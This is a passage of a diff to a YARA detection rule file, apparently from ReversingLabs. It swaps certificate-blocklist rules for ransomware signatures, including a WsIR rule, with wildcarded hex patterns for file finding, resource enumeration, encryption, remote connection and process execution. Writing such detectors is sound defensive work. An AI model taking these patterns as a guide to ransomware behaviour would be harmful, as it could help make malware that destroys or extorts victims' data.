+            ?? 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ??
+            ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 53 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
+            ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 32 DB EB ?? B3 ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ??
+            6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ??
+            ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 8B 1D ?? ?? ?? ??
+            50 FF D3 6A ?? 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59
+            72 ?? 8B 00 50 FF D3 33 DB 43 53 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 53 8D 75 ??
+            E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 59 59 FF 75 ?? FF
+        }
+		$remote_connection_p2 = {
+            D6 FF 75 ?? FF D6 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ??
+            83 78 ?? ?? 59 59 72 ?? 8B 00 50 FF 15 ?? ?? ?? ?? 53 33 FF 8D 75 ?? E8 ?? ?? ?? ??
+            53 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ??
+            ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 33 C9 51 51 51 50 68 ?? ?? ?? ?? 51 FF 15 ??
+            ?? ?? ?? 53 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 53 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 5A 8B C1 39 55 ?? 73 ?? 8D 45 ?? 03 45 ?? 39 55 ??
+            73 ?? 8D 4D ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41 3B C8 75 ?? 8B 45 ?? 39 55 ?? 73 ??
+            8D 45 ?? 03 45 ?? 8B 4D ?? 39 55 ?? 73 ?? 8D 4D ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41
+            3B C8 75 ?? 8B 45 ?? 39 55 ?? 73 ?? 8D 45 ?? 03 45 ?? 8B 4D ?? 39 55 ?? 73 ?? 8D 4D
+            ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41 3B C8 75 ?? 83 EC ?? 8D 45 ?? 8B F4 50 E8 ?? ??
+            ?? ?? 83 EC ?? 8B F4 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 33
+            FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$enum_resources_p1 = {
+            55 8B EC 83 E4 ?? 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 53 56 57 FF 15 ?? ?? ??
+            ?? 83 64 24 ?? ?? 89 44 24 ?? BB ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? D3 EA 33 C0 40
+            23 D0 0F 84 ?? ?? ?? ?? 83 64 24 ?? ?? 6A ?? 80 C1 ?? 5F 88 4C 24 ?? FF 74 24 ?? 8D
+            74 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 83 64 24 ?? ?? 8B 74 24 ?? 53 89
+            7C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 59 03 C6 8D 4C 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D
+            44 24 ?? 50 83 C8 ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53 8B C6
+            E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8B C6 50 FF 15 ?? ?? ?? ?? 6A ?? 33
+            FF 8D 74 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59
+            8B F8 53 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
+            33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53
+            8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
+        }
+		$enum_resources_p2 = {
+            8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D
+            74 24 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 53 E8 ?? ?? ?? ?? 59 8B F8 53 8D 44 24
+            ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? E8 ?? ?? ?? ?? 8D 44 24 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ??
+            E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24 ?? 6A ?? 8D 4C 24 ?? 51 8D
+            4C 24 ?? 51 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 0F AC C8 ?? 89 44 24 ?? 8D
+            44 24 ?? BE ?? ?? ?? ?? C1 E9 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 0F AC C8 ??
+            89 44 24 ?? 8D 44 24 ?? BE ?? ?? ?? ?? C1 E9 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 2B 44 24
+            ?? 8B 4C 24 ?? 1B 4C 24 ?? BE ?? ?? ?? ?? 0F AC C8 ?? 89 44 24 ?? 8D 44 24 ?? C1 E9
+            ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? FF 44 24 ?? 83 7C 24 ?? ??
+            0F 8C ?? ?? ?? ?? 8B 4C 24 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_files_1_p1 = {
+            6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0
+            0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ??
+            E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ??
+            59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ??
+            ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84
+        }
+		$find_files_1_p2 = {
+            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
+            ?? E8 ?? ?? ?? ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ??
+            ?? 59 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 0F
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ??
+            ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ??
+            ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 59 84 C0 75 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ??
+            ?? ?? 59 84 C0 75 ?? 83 EC ?? 8D 44 24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ??
+            FF 15
+        }
+		$find_files_2_p1 = {
+            8D 44 24 ?? 8D 8C 24 ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84
+            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F
+            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ??
+            ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6
+            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 8D
+            84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 57 8D 84 24 ?? ?? ?? ?? 50 FF D6
+            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
+        }
+		$find_files_2_p2 = {
+            50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0
+            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? E8 ??
+            ?? ?? ?? 83 4C 24 ?? ?? 83 EC ?? 8B C4 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 4C
+            24 ?? 8B C4 51 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 84 24 ?? ??
+            ?? ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 83 4C 24 ?? ?? 83 EC ?? 8B C4 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? 8B C4 51 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ??
+            83 C4 ?? 85 C0 75 ?? 32 DB EB ?? B3 ?? F6 44 24 ?? ?? 74 ?? 83 64 24 ?? ?? 6A ?? 33
+            FF 8D 74 24 ?? E8 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 83 64 24 ?? ?? 6A ?? 33 FF 8D 74
+        }
+		$find_files_2_p3 = {
+            24 ?? E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? F6 84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ??
+            ?? ?? 50 0F 84 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F0 8B
+            46 ?? 59 83 C9 ?? 2B C8 83 F9 ?? 0F 86 ?? ?? ?? ?? 8D 58 ?? 6A ?? 8B C6 E8 ?? ?? ??
+            ?? 84 C0 74 ?? 83 7E ?? ?? 8B 4E ?? 72 ?? 8B 06 EB ?? 8B C6 6A ?? 5A 66 89 14 48 83
+            7E ?? ?? 89 5E ?? 72 ?? 8B 06 EB ?? 8B C6 33 C9 66 89 0C 58 8B DE 8D 74 24 ?? E8 ??
+            ?? ?? ?? 8B DE 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33 FF E8 ?? ?? ?? ?? 6A ?? 8D 74 24
+            ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 44 24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44
+            24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 44 24 ?? E8
+            ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 59 6A ?? 33 FF 8D 74 24 ?? E8
+            ?? ?? ?? ?? 6A ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 40 33 C9 8D 74 24 ?? E8 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? E8 ?? ??
+            ?? ?? 59 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 40 33 C9
+            8D 74 24 ?? E8
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 8B D9 33 F6 C7 43 ??
+            ?? ?? ?? ?? 89 73 ?? C6 03 ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 57 2B C1 6A ?? 99 5F
+            F7 FF 89 9D ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 85 C0 74 ?? 89 B5 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 83 EC ?? 03 C1 8B F4 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A
+            ?? 50 83 C8 ?? 8B F3 E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
+            ?? 8B 0D ?? ?? ?? ?? 2B C1 6A ?? 99 5E F7 FE FF 85 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ??
+            39 85 ?? ?? ?? ?? 72 ?? 8B 53 ?? 6A ?? 5F C6 85 ?? ?? ?? ?? ?? 3B D7 72 ?? 8B 0B EB
+            ?? 8B CB 8B 43 ?? 03 C1 3B D7 72 ?? 8B 0B EB ?? 8B CB 50 51 8D 85 ?? ?? ?? ?? 50 8D
+            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 39 7B ?? 72 ?? 8B 03 EB ?? 8B C3 8B 5B ?? 8B
+            B5 ?? ?? ?? ?? 03 D8 53 FF B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B
+            4E ?? C6 85 ?? ?? ?? ?? ?? 3B CF 72 ?? 8B 16 EB ?? 8B D6 8B 46 ?? 03 C2 3B CF 72 ??
+            8B 0E EB ?? 8B CE 50 51 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 39 7E ?? 72 ?? 8B 0E EB ?? 8B CE 8B 46 ?? 03 C1 50 FF B5 ?? ?? ?? ?? 8D 9D ?? ??
+            ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 46 ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4E
+        }
+		$encrypt_files_p2 = {
+            89 85 ?? ?? ?? ?? 3B CF 72 ?? 8B 16 EB ?? 8B D6 8B 46 ?? 03 C2 3B CF 72 ?? 8B 0E EB
+            ?? 8B CE 3B C8 74 ?? 8B B5 ?? ?? ?? ?? 2B F1 8A 11 88 14 0E 41 3B C8 75 ?? 8D 45 ??
+            50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 75 ?? 8B F8 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 8D 45 ?? E8 ?? ?? ?? ?? 8B F0 8B 46 ?? 8B 56 ?? 59 59 8B 4F ?? 2B C2 3B C8 76 ??
+            8B 47 ?? 2B C1 3B C2 72 ?? 56 8B F7 E8 ?? ?? ?? ?? EB ?? 6A ?? 57 83 C8 ?? E8 ?? ??
+            ?? ?? 8B D8 8D 75 ?? E8 ?? ?? ?? ?? 8B C6 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 33 DB 53 68 ?? ?? ?? ?? 6A ?? 53 53 68 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8
+            ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 3B F3 74 ?? 53 53 53 56
+            FF 15 ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 56 FF
+            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 59 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Teleneras MB" and pe.signatures [ i ] . serial == "03:a7:74:8a:43:55:02:0a:65:24:66:b5:e0:2e:07:de" and 1575244801 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_1_p* ) ) and ( all of ( $find_files_2_p* ) ) and ( all of ( $enum_resources_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B881A72D4117Bbc38B81D3C65C792C1A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Wsir : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects WsIR ransomware."
 		author = "ReversingLabs"
-		id = "593c1799-a5df-5b3e-8a8b-826d808a14f0"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "cb4ab736-9421-5b92-b4a5-c5db0b61725a"
+		date = "2022-08-02"
+		modified = "2022-08-02"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3808-L3826"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bad2a06090f077ebc635d21446b47c9f115fe477567afb3d5994043f5a7883b1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.WsIR.yara#L1-L73"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c22c01f93945c7721ebfe5e7a09c3bf2b9d0ad95740bc0a76b4e61741f61d82c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WsIR"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Red GmbH" and ( pe.signatures [ i ] . serial == "00:b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" or pe.signatures [ i ] . serial == "b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" ) and 1581936420 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_08653Ef2Ed9E6Ebb56Ffa7E93F963235 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "9ac976c0-260f-5207-ae39-bbb722c38a92"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3828-L3844"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5ae8d2fb03cd0f945c2f5eb86de4e5da4fbb1cdf233d8a808157304538ced872"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53
+            55 8B E9 8D 4C 24 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? C7 84 24 ?? ?? ?? ?? ??
+            ?? ?? ?? 8B 41 ?? 85 C0 74 ?? 8D 54 24 ?? 6A ?? 52 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 00
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 85 C0 0F 95 C3 E8 ?? ?? ?? ??
+            84 DB 74 ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8
+            ?? ?? ?? ?? 8B 4C 24 ?? 8D 44 24 ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75
+            ?? 8D 4C 24 ?? 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56 8B B4 24 ?? ??
+            ?? ?? 57 8B 3D ?? ?? ?? ?? BB ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 8D 54 24 ?? 68 ?? ??
+            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 45 ?? 8D 54 24 ?? 52 6A ?? 8D 8C 24 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 50 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 89 4C 24 ?? 89 5C 24 ?? FF D7 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ??
+            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 56 6A ?? 68
+            ?? ?? ?? ?? 51 FF D7 8D 4C 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F
+            5E 8B 8C 24 ?? ?? ?? ?? 5D 5B 64 89 0D ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2
+        }
+		$encrypt_files = {
+            FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ??
+            ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ??
+            ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85
+            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ??
+            E9
+        }
+		$exec_proc = {
+            52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ??
+            ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF D3 8D 4C 24 ?? 8D 54 24 ?? 51 52 68 ?? ?? ??
+            ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B
+            F0 83 C4 ?? 85 F6 75 ?? 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8D 74 04 ?? EB ?? 8D 57 ??
+            8D 4C 24 ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 85 C9 0F 85 ?? ?? ?? ?? 8D 4C 24
